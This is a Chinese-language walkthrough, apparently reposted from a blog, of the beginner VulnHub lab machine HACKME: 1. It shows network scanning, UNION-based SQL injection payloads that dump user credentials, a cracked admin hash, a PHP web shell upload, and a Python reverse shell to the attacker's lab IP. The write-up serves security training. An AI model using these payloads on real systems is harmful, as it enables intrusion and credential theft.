靶机渗透HACKME: 1

Posted 独角授

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了靶机渗透HACKME: 1相关的知识,希望对你有一定的参考价值。

【靶机渗透】HACKME: 1

本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1

0x01靶机介绍

1. 详情

链接https://www.vulnhub.com/entry/hackme-1,330/
发布日期2019年7月18日
作者x4bx54
难度初学者,简单

2. 描述

‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为 root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

1. 下载靶机

官网链接直接下载

image-20210617191840684

2. 创建靶机

下载好后直接将ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建

image-20210617225501132

创建完成

3. 开启靶机

点击 ▶开启此虚拟机

image-20210617225439832

0x03靶机渗透

攻击机使用Kali Linux (IP:192.168.64.128)

1. 主机发现

arp-scan -l

发现目标主机 192.168.64.137

image-20210617225957487

2. 端口扫描

masscan 192.168.64.137 --rate=10000 --ports 0-65535

image-20210617230159277

识别2个开放的tcp端口22,80

3. 服务扫描

nmap -T4 -sV -O -p22,80 192.168.64.137

-sV服务版本 -T4速度(最高为5,推荐用4) -O系统 -p 指定端口

image-20210617230435101

22是ssh,80是Apache http服务

4. web信息收集

目录扫描工具进行扫描,看能否找到可利用信息

image-20210617234450546

访问该链接http://192.168.64.137/register.php,是一个网站注册页面

创建一个密码为safefox的用户safefox并登录。

image-20210619180603861

这种网站类似于图书目录查询网站

image-20210618235735583

可能有注入点

0x04漏洞利用

1.SQL注入

尝试进行手动 SQL 注入

01-判断类型

s' or 1=1-- -

image-20210619010302204

单引号字符型注入

02-确定显示位

使用 UNION 命令来查找其中存在的列数

s' union select 1,2-- -

image-20210619183231942

s' union select 1,2,3-- -

image-20210619183443105

03-查询基本信息

识别正在使用的数据库

s' union select database(),2,3-- -

image-20210619184653469

webapphacking

识别 SQL 数据库的版本

s' union select version(),2,3-- -

image-20210619184816097

04-查找所有数据库

s' union select schema_name,2,3 FROM information_schema.schemata-- -

image-20210619185311519

05-获取表名

s' union select group_concat(table_name separator 0x3c62723e),2,3 from information_schema.tables where table_schema=database()-- -

image-20210619191622711

06-获取特定表列名

获取书籍和用户的列名

s' union select column_name,2,3 from information_schema.columns where table_name = 'books' -- -

image-20210619191817614

s' union select column_name,2,3 from information_schema.columns where table_name = 'users' -- -

image-20210619191930662

07-获取数据

s' union select group_concat(user,":",pasword),2,3 from users -- -

image-20210619193059069

破解superadmin用户的密码hash:superadmin:2386acb2cf356944177746fc92523983

image-20210619193748795

superadmin:Uncrackable

2.文件上传

登录管理员用户网页,发现上传点

image-20210619194401015

上传2.php

<?php system($_GET['cmd']); ?>

上传成功,并知道文件已经上传到uploads文件夹

image-20210619213849579

尝试访问http://192.168.64.137/uploads/2.php

image-20210619195153600

3.反弹shell

接下来使用harkbar工具传递执行 python反弹shell

http://192.168.64.137/uploads/2.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.64.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

攻击机nc监听

image-20210619200210113

反弹成功!

通过以下命令获取一个标准shell

python -c 'import pty; pty.spawn("/bin/bash")'

image-20210619200938621

4.提权

识别存在的用户

image-20210619201219593

在/home/legacy文件夹中发现存在touchmenot二进制文件,执行touchmenot即可获取ROOT权限。

./touchmenot

image-20210619201843618

以上是关于靶机渗透HACKME: 1的主要内容,如果未能解决你的问题,请参考以下文章

靶机渗透HACKME: 1

靶机渗透 HACKME-2 (详细渗透,适合新手渗透)

靶机渗透 hackme-1(详解,适合新手)

(Vulnhub练习)-- HACKME: 1渗透实战

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

靶机渗透lazysysadmin